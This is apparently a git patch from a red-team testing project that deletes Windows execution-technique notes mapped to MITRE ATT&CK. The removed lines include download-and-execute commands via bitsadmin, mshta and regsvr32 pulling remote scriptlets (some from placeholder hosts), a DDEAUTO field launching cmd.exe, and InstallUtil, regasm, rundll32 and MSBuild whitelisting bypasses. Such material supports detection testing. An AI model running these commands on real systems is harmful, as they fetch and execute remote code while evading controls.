From 9985eef47788bcf0ac1b36e7c6b9c87ff7fdec6f Mon Sep 17 00:00:00 2001
From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com>
Date: Wed, 23 May 2018 20:02:58 -0600
Subject: [PATCH] delete yamlized things
---
 Windows/Execution/Bitsadmin.md | 11 ----------
 Windows/Execution/CMSTP.md | 15 -------------
 Windows/Execution/Dynamic_Data_Exchange.md | 19 ----------------
 Windows/Execution/InstallUtil.md | 15 -------------
 Windows/Execution/Mshta.md | 12 ----------
 Windows/Execution/RegsvcsRegasm.md | 22 -------------------
 Windows/Execution/Regsvr32.md | 16 --------------
 Windows/Execution/Rundll32.md | 13 -----------
 .../Execution/Trusted_Developer_Utilities.md | 12 ----------
 9 files changed, 135 deletions(-)
 delete mode 100644 Windows/Execution/Bitsadmin.md
 delete mode 100644 Windows/Execution/CMSTP.md
 delete mode 100644 Windows/Execution/Dynamic_Data_Exchange.md
 delete mode 100644 Windows/Execution/InstallUtil.md
 delete mode 100644 Windows/Execution/Mshta.md
 delete mode 100644 Windows/Execution/RegsvcsRegasm.md
 delete mode 100644 Windows/Execution/Regsvr32.md
 delete mode 100644 Windows/Execution/Rundll32.md
 delete mode 100644 Windows/Execution/Trusted_Developer_Utilities.md
diff --git a/Windows/Execution/Bitsadmin.md b/Windows/Execution/Bitsadmin.md
deleted file mode 100644
index 2452527b..00000000
--- a/Windows/Execution/Bitsadmin.md
+++ /dev/null
@@ -1,11 +0,0 @@
-## BITS Jobs
-
-MITRE ATT&CK Technique: [T1197](https://attack.mitre.org/wiki/Technique/T1197)
-
-### bitsadmin.exe
-
- bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
-
-### PowerShell
-
- Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md -Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
diff --git a/Windows/Execution/CMSTP.md b/Windows/Execution/CMSTP.md
deleted file mode 100644
index 1ab9f1a0..00000000
--- a/Windows/Execution/CMSTP.md
+++ /dev/null
@@ -1,15 +0,0 @@
-## CMSTP
-
-MITRE ATT&CK Technique: [T1191](https://attack.mitre.org/wiki/Technique/T1191)
-
-### Scriptlet execution
-
-Local:
-
- cmstp.exe /s CMSTP.inf
-
-## Test Script
-
-[CMSTP.INF](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/CMSTP.inf)
-
-[CMSTP.SCT](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/CMSTP.sct)
diff --git a/Windows/Execution/Dynamic_Data_Exchange.md b/Windows/Execution/Dynamic_Data_Exchange.md
deleted file mode 100644
index 0e7e4c8c..00000000
--- a/Windows/Execution/Dynamic_Data_Exchange.md
+++ /dev/null
@@ -1,19 +0,0 @@
-# Dynamic Data Exchange
-
-MITRE ATT&CK Technique: [T1173](https://attack.mitre.org/wiki/Technique/T1173)
-
-
-### Microsoft Word
-
-Open,
-
-Insert tab -> Quick Parts -> Field
-
-Choose = (Formula) and click ok.
-
-After that, you should see a Field inserted in the document with an error “!Unexpected End of Formula”, right-click the Field, and choose Toggle Field Codes.
-
-The Field Code should now be displayed, change it to Contain the following:
-
-
- {DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" }
diff --git a/Windows/Execution/InstallUtil.md b/Windows/Execution/InstallUtil.md
deleted file mode 100644
index 5534fc11..00000000
--- a/Windows/Execution/InstallUtil.md
+++ /dev/null
@@ -1,15 +0,0 @@
-## InstallUtil
-
-MITRE ATT&CK Technique: [T1118](https://attack.mitre.org/wiki/Technique/T1118)
-
-### Execution Examples:
-
-Input:
-
- x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InstallUtilBypass.dll
-
- x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InstallUtilBypass.dll
-
-## Test Script
-
-[InstallUtilBypass.cs](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/InstallUtilBypass.cs)
diff --git a/Windows/Execution/Mshta.md b/Windows/Execution/Mshta.md
deleted file mode 100644
index 4a06deb5..00000000
--- a/Windows/Execution/Mshta.md
+++ /dev/null
@@ -1,12 +0,0 @@
-## Mshta
-
-MITRE ATT&CK Technique: [T1170](https://attack.mitre.org/wiki/Technique/T1170)
-
-### Example Execution:
-
- mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
-
-## Test Script
- mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/mshta.sct").Exec();close();
-
-[mshta.sct](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct)
diff --git a/Windows/Execution/RegsvcsRegasm.md b/Windows/Execution/RegsvcsRegasm.md
deleted file mode 100644
index a65c88c5..00000000
--- a/Windows/Execution/RegsvcsRegasm.md
+++ /dev/null
@@ -1,22 +0,0 @@
-## Regsvcs/Regasm
-
-MITRE ATT&CK Technique: [T1121](https://attack.mitre.org/wiki/Technique/T1121)
-
-### Execution Examples:
-
-[DLL](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/AllTheThings)
-
-Input:
-
- x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll
-
- x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll
-
-
- x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll
-
- x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll
-
-
-## Test Script
-[RegSvcsRegAsmBypass.cs](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs)
diff --git a/Windows/Execution/Regsvr32.md b/Windows/Execution/Regsvr32.md
deleted file mode 100644
index 1f790250..00000000
--- a/Windows/Execution/Regsvr32.md
+++ /dev/null
@@ -1,16 +0,0 @@
-## Regsvr32
-
-MITRE ATT&CK Technique: [T1117](https://attack.mitre.org/wiki/Technique/T1117)
-
-### Local Scriptlet Execution:
-
- regsvr32.exe /s /u /i:file.sct scrobj.dll
-
-### Remote Scriptlet Exection:
-
- regsvr32.exe /s /u /i:http://example.com/file.sct scrobj.dll
-
-## Test Script
-
-[regsvr32.sct](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvr32.sct)
-
diff --git a/Windows/Execution/Rundll32.md b/Windows/Execution/Rundll32.md
deleted file mode 100644
index 0d8164bd..00000000
--- a/Windows/Execution/Rundll32.md
+++ /dev/null
@@ -1,13 +0,0 @@
-## Rundll32
-
-MITRE ATT&CK Technique: [T1085](https://attack.mitre.org/wiki/Technique/T1085)
-
-### Executes an export inside of a dll.
-
- rundll32 AllTheThings.dll,EntryPoint
-
-## Test Script
-
-[AlltheThings.dll](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/AllTheThings)
-
-
diff --git a/Windows/Execution/Trusted_Developer_Utilities.md b/Windows/Execution/Trusted_Developer_Utilities.md
deleted file mode 100644
index 47992d0d..00000000
--- a/Windows/Execution/Trusted_Developer_Utilities.md
+++ /dev/null
@@ -1,12 +0,0 @@
-## Trusted Developer Utilities
-
-MITRE ATT&CK Technique: [T1127](https://attack.mitre.org/wiki/Technique/T1127)
-
-### MSBuild.exe - [Inline Tasks](https://msdn.microsoft.com/en-us/library/dd722601.aspx)
-
- C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe File.csproj
-
-## Test Script
-
-[MSBuildBypass.csproj](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/MSBuildBypass.csproj)
-